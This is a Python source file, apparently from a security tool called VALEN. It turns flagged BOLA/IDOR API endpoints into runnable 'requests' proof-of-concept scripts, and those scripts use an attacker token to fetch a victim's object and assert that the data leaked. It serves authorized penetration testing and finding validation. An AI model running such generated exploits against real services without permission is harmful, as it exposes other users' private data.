"""Red-team assistance: turn a structural finding + witness into an executable PoC.

A BOLA/IDOR candidate is a user-supplied object id on a sensitive resource with
no ownership binding. VALEN's Z3 ownership witness supplies the *violating
assignment* (attacker session reads the victim's object). This module turns that
into a runnable ``requests`` proof-of-concept a pentester can execute and, with a
live target, that the ``live`` validator can replay to confirm impact.
"""

from __future__ import annotations

import re
from typing import List, Sequence


def build_url(path: str, id_params: Sequence[str], victim: str) -> str:
    """Substitute object-id placeholders in ``path`` and append query id params.

    ``victim`` may be a real value (live replay) or a ``{VICTIM_ID}``
    placeholder (PoC template).
    """
    url = path
    for name in re.findall(r"\{([^}]+)\}", path):
        url = url.replace("{" + name + "}", victim)
    q = "&".join(f"{p}={victim}" for p in id_params)
    if q:
        url = url + ("&" if "?" in url else "?") + q
    return url


def render_poc(
    method: str,
    path: str,
    id_params: Sequence[str],
    leak_hint: str = "",
    base_url: str = "http://localhost:8888",
    token_var: str = "TOKEN",
    victim_var: str = "VICTIM_ID",
) -> str:
    """Render a runnable Python PoC for a BOLA/IDOR endpoint.

    The red team fills two values --- an attacker bearer token and the victim's
    object id --- and the script issues the request and asserts impact.
    """
    placeholder = "{" + victim_var + "}"
    path_with = build_url(path, id_params, placeholder)
    req = method.lower()

    asserts = 'assert r.status_code == 200, "endpoint did not return the resource (status={})".format(r.status_code)\n'
    if leak_hint:
        asserts += (
            f'assert {leak_hint!r} in r.text, "expected leaked data {leak_hint!r} '
            f'not in response"\n'
        )
    asserts += 'print("BOLA confirmed: attacker reached the victim\'s resource")'

    return (
        "# BOLA/IDOR proof-of-concept (generated by VALEN red-team assistant)\n"
        "import requests\n\n"
        f'BASE = {base_url!r}\n'
        f'{token_var} = "<attacker bearer token>"\n'
        f'{victim_var} = "<victim object id>"\n\n'
        f'url = BASE + {path_with!r}.format({victim_var}={victim_var})\n'
        f'r = requests.{req}(url, headers={{"Authorization": "Bearer " + {token_var}}})\n'
        'print("status:", r.status_code)\n'
        "print(r.text[:500])\n"
        + asserts
        + "\n"
    )


def generate_pocs(
    spec: dict,
    labels: dict,
    base_url: str = "http://localhost:8888",
    leak_hints: dict = None,
) -> List[dict]:
    """Generate one PoC per documented BOLA/IDOR endpoint.

    Returns a list of ``{method, path, id_params, poc}`` for each vulnerable
    operation named in ``labels["vulnerable"]``.
    """
    leak_hints = leak_hints or {}
    flagged = set(labels["vulnerable"])
    out: List[dict] = []
    from valen.analysis.api_bola import api_bola_candidates
    for method, path, id_params in api_bola_candidates(spec):
        if f"{method} {path}" not in flagged:
            continue
        hint = leak_hints.get(f"{method} {path}", "")
        out.append({
            "method": method,
            "path": path,
            "id_params": id_params,
            "leak_hint": hint,
            "poc": render_poc(method, path, id_params, hint, base_url),
        })
    return out
